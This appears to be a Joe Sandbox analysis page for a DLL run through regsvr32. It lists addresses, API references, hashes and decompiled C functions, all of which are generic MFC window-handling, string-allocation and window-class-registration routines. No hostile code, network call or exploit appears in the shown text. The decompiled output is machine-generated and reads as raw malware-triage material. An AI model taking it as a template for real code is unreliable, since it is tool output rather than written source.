0x1001a13a
0x1001a234
0x1001a23d
0x1001a241
0x1001a246
0x00000000
0x1001a140
0x1001a140
0x1001a143
0x1001a1fb
0x1001a204
0x1001a208
0x1001a20d
0x00000000
0x1001a149
0x1001a149
0x1001a14c
0x1001a152
0x1001a155
0x1001a1c5
0x1001a1cc
0x1001a1d2
0x1001a1dc
0x1001a1e0
0x1001a1e5
0x00000000
0x1001a157
0x1001a157
0x1001a15a
0x00000000
0x1001a15c
0x1001a15c
0x1001a15f
0x00000000
0x00000000
0x1001a15f
0x1001a15a
0x1001a155
0x1001a14c
0x1001a143
0x1001a04e
0x1001a04e
0x1001a41f
0x1001a42d
0x1001a43d
0x1001a441
0x1001a44a
0x1001a44e
0x1001a45a
0x1001a45c
0x1001a45f
0x1001a45f
0x1001a462
0x1001a465
0x1001a054
0x1001a055
0x1001a055
0x1001a056
0x1001a190
0x1001a1a6
0x1001a1af
0x1001a1b3
0x1001a1b8
0x00000000
0x1001a05c
0x1001a05c
0x1001a05c
0x1001a05d
0x1001a165
0x1001a176
0x1001a17f
0x1001a183
0x1001a188
0x00000000
0x1001a063
0x1001a063
0x1001a063
0x1001a064
0x1001a110
0x1001a113
0x1001a11c
0x1001a126
0x1001a12a
0x1001a12f
0x00000000
0x1001a06a
0x1001a06a
0x1001a06a
0x1001a06b
0x1001a0e3
0x1001a0e6
0x1001a0f3
0x1001a0f7
0x1001a0fc
0x00000000
0x1001a06d
0x1001a06d
0x1001a06d
0x1001a06e
0x1001a0a9
0x1001a0b3
0x1001a0b9
0x1001a0bc
0x1001a0c6
0x1001a0ca
0x1001a0cf
0x00000000
0x1001a070
0x1001a070
0x1001a071
0x1001a083
0x1001a086
0x1001a093
0x1001a097
0x1001a09c
0x1001a213
0x1001a214
0x1001a217
0x1001a217
0x1001a071
0x1001a06e
0x1001a06b
0x1001a064
0x1001a05d
0x1001a056
0x1001a04e
0x1001a048
0x1001a03f
0x1001a471
0x1001a47a
0x1001a47a
0x10019ff8
0x10019ff8
0x10019fff
0x1001a008
0x1001a008
0x1001a482
0x1001a48a
0x1001a48b
0x1001a48c
0x1001a49b

APIs

__EH_prolog3.LIBCMT ref: 10019FA3
VariantClear.OLEAUT32(?), ref: 1001A008

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

VariantClear.OLEAUT32(?), ref: 1001A217
VariantClear.OLEAUT32(?), ref: 1001A289
VariantClear.OLEAUT32(?), ref: 1001A47A

Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2

Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642

Part of subcall function 1001C08A: __EH_prolog3.LIBCMT ref: 1001C094
Part of subcall function 1001C08A: lstrlenA.KERNEL32(?,00000224,1001A446,?,00000008,00000000,?,000000CC), ref: 1001C0B3
Part of subcall function 1001C08A: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1001C0BB

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
String ID:
API String ID: 1021156189-0
Opcode ID: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
Instruction ID: 4e7b89f9de4aa6b433371361e179044e480e3473b7358c3f62ac7a10d9bffcd1
Opcode Fuzzy Hash: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
Instruction Fuzzy Hash: B3F1587480014CEADF55DFA4C880AED7BB9FF09344F50805AF8559B292EB74EAC8DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001D5EB Relevance: 9.1, APIs: 6, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E1001D5EB(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x10045580; // 0x771f5646
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E10020F40(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E1001056A(_t74, 0x10038ea0);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E1001056A(_t74, 0x10036ce4);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1001FBB5(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

APIs

_memset.LIBCMT ref: 1001D61A
SysAllocString.OLEAUT32(00000000), ref: 1001D66B
SysAllocString.OLEAUT32(00000000), ref: 1001D68F

Part of subcall function 1000567F: __EH_prolog3.LIBCMT ref: 10005686

SysAllocString.OLEAUT32(00000000), ref: 1001D6E7
SysAllocString.OLEAUT32(00000000), ref: 1001D710
SysAllocString.OLEAUT32(00000000), ref: 1001D73F

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
Instruction ID: 6e1135c887c9357414f922cece5f9f8fee59e25652f77c4319450727ae6b76bc
Opcode Fuzzy Hash: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
Instruction Fuzzy Hash: 00415E34900208CFDB24EFB8D881A9EB7B1FF54354F10852EF5A69B2A6DB71A854CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000772D Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000772D(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10045580; // 0x771f5646
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000764E(0);
				_t67 = _t72;
				_t63 = E10007682(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E100075B7(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000764E(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1001FBB5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

APIs

Part of subcall function 10007682: GetParent.USER32(?), ref: 100076D5
Part of subcall function 10007682: GetLastActivePopup.USER32(?), ref: 100076E4
Part of subcall function 10007682: IsWindowEnabled.USER32(?), ref: 100076F9
Part of subcall function 10007682: EnableWindow.USER32(?,00000000), ref: 1000770C

EnableWindow.USER32(?,00000001), ref: 1000777A
GetWindowThreadProcessId.USER32(?,?), ref: 10007788
GetCurrentProcessId.KERNEL32(?,?), ref: 10007792
SendMessageA.USER32 ref: 100077A7
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 10007824
EnableWindow.USER32(?,00000001), ref: 10007860

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
Instruction ID: bdb92c1df6b4a8dc20cb8eb5586ece2812bcce3fef41ea9017e6a72a13aca31b
Opcode Fuzzy Hash: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
Instruction Fuzzy Hash: DB417B32E002589FFB31CF74CC89B9D77A8FF05280F214119E95D9B286EB799944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007682 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007682(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E100075AB();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10005CAE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 100076B4
GetParent.USER32(?), ref: 100076C2
GetParent.USER32(?), ref: 100076D5
GetLastActivePopup.USER32(?), ref: 100076E4
IsWindowEnabled.USER32(?), ref: 100076F9
EnableWindow.USER32(?,00000000), ref: 1000770C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
Instruction ID: 462ae3bbbf91228899846c1fb6a9f27f843f520308df6a83637efefa3aec2235
Opcode Fuzzy Hash: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
Instruction Fuzzy Hash: 3411CE72E04A365BF2229A6D8C80B1B77DCFF49AE0F124115EC0EE7219DB6ACC0046F5

Uniqueness

Uniqueness Score: -1.00%

Function 10011181 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10011181(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10011190
0x100111e1
0x100111e1
0x100111e3
0x100111e7
0x00000000
0x00000000
0x100111ad
0x100111c4
0x100111ca
0x100111dc
0x00000000
0x100111ef
0x100111dc
0x100111e1
0x100111e1
0x100111ec

APIs

ClientToScreen.USER32(?,?), ref: 10011190
GetDlgCtrlID.USER32 ref: 100111A4
GetWindowLongA.USER32 ref: 100111B2
GetWindowRect.USER32 ref: 100111C4
PtInRect.USER32(?,?,?), ref: 100111D4
GetWindow.USER32(?,00000005), ref: 100111E1

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
Instruction ID: 0af4e894630c16eeb035fae8976970eddf4787ec4e71c720814606927fab57bb
Opcode Fuzzy Hash: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
Instruction Fuzzy Hash: 05014B36A0112ABBEB129F958C48EDE7BACEF49791F008014FE11AE061D730DB458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1F4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000D1F4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000EC09(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10020F40(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000EC09(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10048658; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E1000D010(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1000D1B3(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1000D1B3(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 1000D222

Strings

@, xrefs: 1000D32E
@, xrefs: 1000D3C7
AfxMDIFrame80s, xrefs: 1000D2C3
AfxFrameOrView80s, xrefs: 1000D2E8

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
